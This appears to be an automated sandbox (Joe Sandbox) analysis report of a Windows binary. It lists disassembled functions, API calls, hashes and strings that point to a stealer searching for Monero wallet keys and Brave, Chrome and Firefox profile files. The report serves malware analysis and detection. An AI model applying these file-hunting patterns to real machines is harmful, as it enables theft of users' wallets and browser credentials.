                          • Associated: 00000000.00000002.2222768064.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A03000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A28000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A32000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223383200.0000000000A42000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223530596.0000000000BE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223553383.0000000000BE1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_540000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                          • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                          • API String ID: 1125553467-2524465048
                          • Opcode ID: 788b62a7736fc9f0f9d05a592ea60876c2f86300ff96b8e1f84385fe2657cccc
                          • Instruction ID: ee6726cd8cc635dd126b556541277f79f90b32a300dd20c78184e5c2eacc45f4
                          • Opcode Fuzzy Hash: 788b62a7736fc9f0f9d05a592ea60876c2f86300ff96b8e1f84385fe2657cccc
                          • Instruction Fuzzy Hash: CDA154B1A40209ABDB24DF64DC99FFE7778BF84301F048589B90D96141EB759B88CF62
                          Function 0054BE70 Relevance: 37.4, APIs: 17, Strings: 4, Instructions: 675fileCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0055A740: lstrcpy.KERNEL32(00560E17,00000000), ref: 0055A788
                            • Part of subcall function 0055A920: lstrcpy.KERNEL32(00000000,?), ref: 0055A972
                            • Part of subcall function 0055A920: lstrcat.KERNEL32(00000000), ref: 0055A982
                            • Part of subcall function 0055A9B0: lstrlen.KERNEL32(?,01238C68,?,\Monero\wallet.keys,00560E17), ref: 0055A9C5
                            • Part of subcall function 0055A9B0: lstrcpy.KERNEL32(00000000), ref: 0055AA04
                            • Part of subcall function 0055A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0055AA12
                            • Part of subcall function 0055A8A0: lstrcpy.KERNEL32(?,00560E17), ref: 0055A905
                          • FindFirstFileA.KERNEL32(00000000,?,00560B32,00560B2B,00000000,?,?,?,005613F4,00560B2A), ref: 0054BEF5
                          • StrCmpCA.SHLWAPI(?,005613F8), ref: 0054BF4D
                          • StrCmpCA.SHLWAPI(?,005613FC), ref: 0054BF63
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 0054C7BF
                          • FindClose.KERNEL32(000000FF), ref: 0054C7D1
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2222768064.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                          • Associated: 00000000.00000002.2222709605.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A03000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A28000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A32000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223383200.0000000000A42000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223530596.0000000000BE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223553383.0000000000BE1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_540000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                          • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                          • API String ID: 3334442632-726946144
                          • Opcode ID: 65a91ef4e41134e64d14be6a2c096153fe332c1e712076cb176fdc1662b760c5
                          • Instruction ID: a376b533160e8361919a632a0eec6438eb9fd25761e526e0633f112b21ee6eaa
                          • Opcode Fuzzy Hash: 65a91ef4e41134e64d14be6a2c096153fe332c1e712076cb176fdc1662b760c5
                          • Instruction Fuzzy Hash: 74425572910105ABDB14FB70DD6AEED7B3CBBC4301F408659B90697191EE34AB4DCB92
                          Function 00554910 Relevance: 36.9, APIs: 18, Strings: 3, Instructions: 172fileCOMMON
                          Download Yara Rule
                          APIs
                          • wsprintfA.USER32 ref: 0055492C
                          • FindFirstFileA.KERNEL32(?,?), ref: 00554943
                          • StrCmpCA.SHLWAPI(?,00560FDC), ref: 00554971
                          • StrCmpCA.SHLWAPI(?,00560FE0), ref: 00554987
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 00554B7D
                          • FindClose.KERNEL32(000000FF), ref: 00554B92
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2222768064.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                          • Associated: 00000000.00000002.2222709605.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A03000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A28000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A32000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223383200.0000000000A42000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223530596.0000000000BE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223553383.0000000000BE1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_540000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Find$File$CloseFirstNextwsprintf
                          • String ID: %s\%s$%s\%s$%s\*
                          • API String ID: 180737720-445461498
                          • Opcode ID: 04333ad11347fc0ef541f071beec22bdc498b558ccadcaff337a05f21e8f1590
                          • Instruction ID: 25c70a7144cb8ea6f54f23c9828e767d37f53b59e1e27ec353f2f192a2948708
                          • Opcode Fuzzy Hash: 04333ad11347fc0ef541f071beec22bdc498b558ccadcaff337a05f21e8f1590
                          • Instruction Fuzzy Hash: 4A6188B1900219BBDB20EFA0DC59FEA777CBB48701F048589F50996140EB74EB89CFA5
                          Function 00554570 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 137stringmemoryfileCOMMON
                          Download Yara Rule
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00554580
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00554587
                          • wsprintfA.USER32 ref: 005545A6
                          • FindFirstFileA.KERNEL32(?,?), ref: 005545BD
                          • StrCmpCA.SHLWAPI(?,00560FC4), ref: 005545EB
                          • StrCmpCA.SHLWAPI(?,00560FC8), ref: 00554601
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 0055468B
                          • FindClose.KERNEL32(000000FF), ref: 005546A0
                          • lstrcat.KERNEL32(?,0123FC20), ref: 005546C5
                          • lstrcat.KERNEL32(?,0123E5C8), ref: 005546D8
                          • lstrlen.KERNEL32(?), ref: 005546E5
                          • lstrlen.KERNEL32(?), ref: 005546F6
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2222768064.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                          • Associated: 00000000.00000002.2222709605.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A03000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A28000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A32000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223383200.0000000000A42000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223530596.0000000000BE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223553383.0000000000BE1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_540000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                          • String ID: %s\%s$%s\*
                          • API String ID: 671575355-2848263008
                          • Opcode ID: e9e4c2080c383325aa0f174e275d71741ed6d9e5128f18c9a4716fb2cb39c1e4
                          • Instruction ID: d84d3b38120dc258fe4cb8ce6034e4e2a78415416661d8be6979e32facc4e920
                          • Opcode Fuzzy Hash: e9e4c2080c383325aa0f174e275d71741ed6d9e5128f18c9a4716fb2cb39c1e4
                          • Instruction Fuzzy Hash: 1C518AB1550218ABD720EB70DC99FEE777CBB58301F408589F60992190EB789BC8CFA5
                          Function 00553EA0 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 133fileCOMMON
                          Download Yara Rule
                          APIs
                          • wsprintfA.USER32 ref: 00553EC3
                          • FindFirstFileA.KERNEL32(?,?), ref: 00553EDA
                          • StrCmpCA.SHLWAPI(?,00560FAC), ref: 00553F08
                          • StrCmpCA.SHLWAPI(?,00560FB0), ref: 00553F1E
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 0055406C
                          • FindClose.KERNEL32(000000FF), ref: 00554081
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2222768064.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                          • Associated: 00000000.00000002.2222709605.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A03000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A28000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A32000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223383200.0000000000A42000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223530596.0000000000BE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223553383.0000000000BE1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_540000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Find$File$CloseFirstNextwsprintf
                          • String ID: %s\%s
                          • API String ID: 180737720-4073750446
                          • Opcode ID: 5be10a7a47545d9d5a4ddb7ed8d6ecca863d1e697075e10f3d1d992c0c69e382
                          • Instruction ID: 3a2c943eeae5c1b31f3e56dc2bf6dc11c673c420c55e6ef6cc633be02eb5b601
                          • Opcode Fuzzy Hash: 5be10a7a47545d9d5a4ddb7ed8d6ecca863d1e697075e10f3d1d992c0c69e382
                          • Instruction Fuzzy Hash: 73518EB1500219BBDB24FBB0DC59EFA777CBB44301F008589B65996040DB79EB89CF65
                          Function 0054ED20 Relevance: 17.9, APIs: 9, Strings: 1, Instructions: 369fileCOMMON
                          Download Yara Rule
                          APIs
                          • wsprintfA.USER32 ref: 0054ED3E
                          • FindFirstFileA.KERNEL32(?,?), ref: 0054ED55
                          • StrCmpCA.SHLWAPI(?,00561538), ref: 0054EDAB
                          • StrCmpCA.SHLWAPI(?,0056153C), ref: 0054EDC1
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 0054F2AE
                          • FindClose.KERNEL32(000000FF), ref: 0054F2C3
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2222768064.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                          • Associated: 00000000.00000002.2222709605.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A03000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A28000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A32000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223383200.0000000000A42000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223530596.0000000000BE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223553383.0000000000BE1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_540000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Find$File$CloseFirstNextwsprintf
                          • String ID: %s\*.*
                          • API String ID: 180737720-1013718255
                          • Opcode ID: a333c05285d4963d55e2d798cbccf320a711b56104f115c23e3c14cec2014cfe
                          • Instruction ID: 486ff4cc767123a5fac0bb584b301631ae7ed16b74af6591e34bbe1b86cb7b05
                          • Opcode Fuzzy Hash: a333c05285d4963d55e2d798cbccf320a711b56104f115c23e3c14cec2014cfe
                          • Instruction Fuzzy Hash: 8DE106729111195AEB54FB60CC66EEE7B38BF94301F40429AB90B62452EF306F8ECF51
                          Function 0054F6B0 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 275fileCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0055A740: lstrcpy.KERNEL32(00560E17,00000000), ref: 0055A788
                            • Part of subcall function 0055A920: lstrcpy.KERNEL32(00000000,?), ref: 0055A972
                            • Part of subcall function 0055A920: lstrcat.KERNEL32(00000000), ref: 0055A982
                            • Part of subcall function 0055A9B0: lstrlen.KERNEL32(?,01238C68,?,\Monero\wallet.keys,00560E17), ref: 0055A9C5
                            • Part of subcall function 0055A9B0: lstrcpy.KERNEL32(00000000), ref: 0055AA04
                            • Part of subcall function 0055A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0055AA12
                            • Part of subcall function 0055A8A0: lstrcpy.KERNEL32(?,00560E17), ref: 0055A905
                          • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,005615B8,00560D96), ref: 0054F71E
                          • StrCmpCA.SHLWAPI(?,005615BC), ref: 0054F76F
                          • StrCmpCA.SHLWAPI(?,005615C0), ref: 0054F785
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 0054FAB1
                          • FindClose.KERNEL32(000000FF), ref: 0054FAC3
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2222768064.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                          • Associated: 00000000.00000002.2222709605.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A03000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A28000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A32000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223383200.0000000000A42000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223530596.0000000000BE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223553383.0000000000BE1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_540000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                          • String ID: prefs.js
                          • API String ID: 3334442632-3783873740
                          • Opcode ID: 2450c32237b4c24d5d2281e2d4b05470d8092b8e62874258cba5339ef6e90989
                          • Instruction ID: 5abe8a42dcb01abe18968737260197d16a9184e07284bc86d766a53c2c46c932
                          • Opcode Fuzzy Hash: 2450c32237b4c24d5d2281e2d4b05470d8092b8e62874258cba5339ef6e90989
                          • Instruction Fuzzy Hash: 9AB174719101199BDB24FF64DC69EEE7B78BF94301F4086A9A80A97141EF306B4DCF92
                          Function 005416D0 Relevance: 14.5, APIs: 7, Strings: 1, Instructions: 492fileCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0055A740: lstrcpy.KERNEL32(00560E17,00000000), ref: 0055A788
                          • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,0056510C,?,?,?,005651B4,?,?,00000000,?,00000000), ref: 00541923
                          • StrCmpCA.SHLWAPI(?,0056525C), ref: 00541973
                          • StrCmpCA.SHLWAPI(?,00565304), ref: 00541989
                          • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00541D40
                          • DeleteFileA.KERNEL32(00000000), ref: 00541DCA
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 00541E20
                          • FindClose.KERNEL32(000000FF), ref: 00541E32
                            • Part of subcall function 0055A920: lstrcpy.KERNEL32(00000000,?), ref: 0055A972
                            • Part of subcall function 0055A920: lstrcat.KERNEL32(00000000), ref: 0055A982
                            • Part of subcall function 0055A9B0: lstrlen.KERNEL32(?,01238C68,?,\Monero\wallet.keys,00560E17), ref: 0055A9C5
                            • Part of subcall function 0055A9B0: lstrcpy.KERNEL32(00000000), ref: 0055AA04
                            • Part of subcall function 0055A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0055AA12
                            • Part of subcall function 0055A8A0: lstrcpy.KERNEL32(?,00560E17), ref: 0055A905
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2222768064.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                          • Associated: 00000000.00000002.2222709605.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A03000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A28000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A32000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223383200.0000000000A42000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223530596.0000000000BE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223553383.0000000000BE1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_540000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                          • String ID: \*.*
                          • API String ID: 1415058207-1173974218
                          • Opcode ID: c12959f89d3e859727b256b340f39b13bd87ba66f6a073d7a9130be7c5cc3e3f
                          • Instruction ID: daf8c50fbbee7dde2974cfddf6bde6fd4dce5af52bbf2213185da11359eefa0b
                          • Opcode Fuzzy Hash: c12959f89d3e859727b256b340f39b13bd87ba66f6a073d7a9130be7c5cc3e3f
                          • Instruction Fuzzy Hash: 6F12D0719101199BDB15EB60CCAAEEE7B78BF94301F40469AB90666091FF306F8DCF91
                          Function 0054DE10 Relevance: 14.4, APIs: 7, Strings: 1, Instructions: 370fileCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0055A740: lstrcpy.KERNEL32(00560E17,00000000), ref: 0055A788
                            • Part of subcall function 0055A9B0: lstrlen.KERNEL32(?,01238C68,?,\Monero\wallet.keys,00560E17), ref: 0055A9C5
                            • Part of subcall function 0055A9B0: lstrcpy.KERNEL32(00000000), ref: 0055AA04
                            • Part of subcall function 0055A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0055AA12
                            • Part of subcall function 0055A8A0: lstrcpy.KERNEL32(?,00560E17), ref: 0055A905
                          • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00560C2E), ref: 0054DE5E
                          • StrCmpCA.SHLWAPI(?,005614C8), ref: 0054DEAE
                          • StrCmpCA.SHLWAPI(?,005614CC), ref: 0054DEC4
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 0054E3E0
                          • FindClose.KERNEL32(000000FF), ref: 0054E3F2
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2222768064.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                          • Associated: 00000000.00000002.2222709605.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A03000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A28000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A32000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223383200.0000000000A42000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223530596.0000000000BE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223553383.0000000000BE1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_540000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                          • String ID: \*.*
                          • API String ID: 2325840235-1173974218
                          • Opcode ID: 3ad2c41210ea8dfb2f26ab15b338d9dc43c798f22d15c921525246c959819eb8
                          • Instruction ID: 97cef51a226f217682985b3e982d204ecac06d4f7c317bdda5e420b4ada69505
                          • Opcode Fuzzy Hash: 3ad2c41210ea8dfb2f26ab15b338d9dc43c798f22d15c921525246c959819eb8
                          • Instruction Fuzzy Hash: D3F191718141199ADB15EB60CCA9EEE7B38BF94301F9042DBB80A62091EF346F4DCF55
                          Function 0054DA80 Relevance: 13.8, APIs: 9, Instructions: 255fileCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0055A740: lstrcpy.KERNEL32(00560E17,00000000), ref: 0055A788
                            • Part of subcall function 0055A920: lstrcpy.KERNEL32(00000000,?), ref: 0055A972
                            • Part of subcall function 0055A920: lstrcat.KERNEL32(00000000), ref: 0055A982
                            • Part of subcall function 0055A9B0: lstrlen.KERNEL32(?,01238C68,?,\Monero\wallet.keys,00560E17), ref: 0055A9C5
                            • Part of subcall function 0055A9B0: lstrcpy.KERNEL32(00000000), ref: 0055AA04
                            • Part of subcall function 0055A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0055AA12
                            • Part of subcall function 0055A8A0: lstrcpy.KERNEL32(?,00560E17), ref: 0055A905
                          • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,005614B0,00560C2A), ref: 0054DAEB
                          • StrCmpCA.SHLWAPI(?,005614B4), ref: 0054DB33
                          • StrCmpCA.SHLWAPI(?,005614B8), ref: 0054DB49
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 0054DDCC
                          • FindClose.KERNEL32(000000FF), ref: 0054DDDE
                          Memory Dump Source
                          • Source File: 00000000.00000002.2222768064.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                          • Associated: 00000000.00000002.2222709605.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
